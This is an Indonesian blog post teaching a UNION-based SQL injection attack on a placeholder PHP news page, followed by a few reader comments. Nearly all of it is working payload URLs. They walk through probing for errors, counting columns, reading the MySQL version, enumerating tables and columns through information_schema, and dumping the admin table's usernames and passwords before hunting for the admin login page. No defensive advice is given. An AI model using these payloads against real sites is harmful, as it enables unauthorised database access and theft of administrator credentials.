Belajar SQL injection


sebelumnya apakah anda sudah tw apa itu sql injection??
sql injection  adalah sebuah aksi penetration test yang dilakukan di aplikasi client dengan cara memodifikasi perintah sql yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
atau secara dasar mengeksploitasi sebuah database




thap melakukan SQL injection :

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

1. carilah target
ex : blablabla/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk mencek apakah ketika kita menekan enter terjadi eror
ex :
blablabla/berita.php?id=100'
sampai si eror keluar


2. carilah jumlah tabel dengan menggunakan perintah

ex : blablabla/berita.php?id=-100+order+by+1--

ceklah secara step by step (satupersatu)...
ex :


blablabla/berita.php?id=-100+order+by+1--
blablabla/berita.php?id=-100+order+by+2--
blablabla/berita.php?id=-100+order+by+........--
blablabla/berita.php?id=-100+order+by+seterusnya--

sampai si eror nongol
ex : blablabla/berita.php?id=-100+order+by+6--

berarti angka togelnya 5
menjadi blablabla/berita.php?id=-100+order+by+5--


3. untuk mencari angka yg eror buat perintah sperti di bawah ini untuk mengetahui si eror
maka: blablabla/berita.php?id=-100+union+select+1,2,3,4,5--

contoh jika yang keluar angka 4

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah ini pd angka togel td
ex : blablabla/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8--

lihat versi yg digunakan jika versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..

4. untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

blablabla/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


5. untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir



blablabla/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

6. perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



blablabla/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

ex  kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E


blablabla/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--

7. memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

ex  : blablabla/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

ex  kata yang keluar adalah id,username,password

ex  : blablabla/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

8. tahap terakhir mencari halaman tempan si admin login

========================================================
Label:

3 komentar:

Wisnu said...

Tidak ada tips untuk mencegah sql injection untuk asp.net?

February 8, 2012 at 11:23 PM
tempek said...

mas mas ada tempek ngak.. Tutormu dari awal dong mas tempek..

April 14, 2012 at 7:56 PM
Anonymous said...

Disini mas tempek, baru lagi dibahas & langsung praktet!! http://forum.developer-id.com/Thread-belajar-sql-injection

December 15, 2012 at 1:29 AM

Post a Comment

Subscribe to: Post Comments (Atom)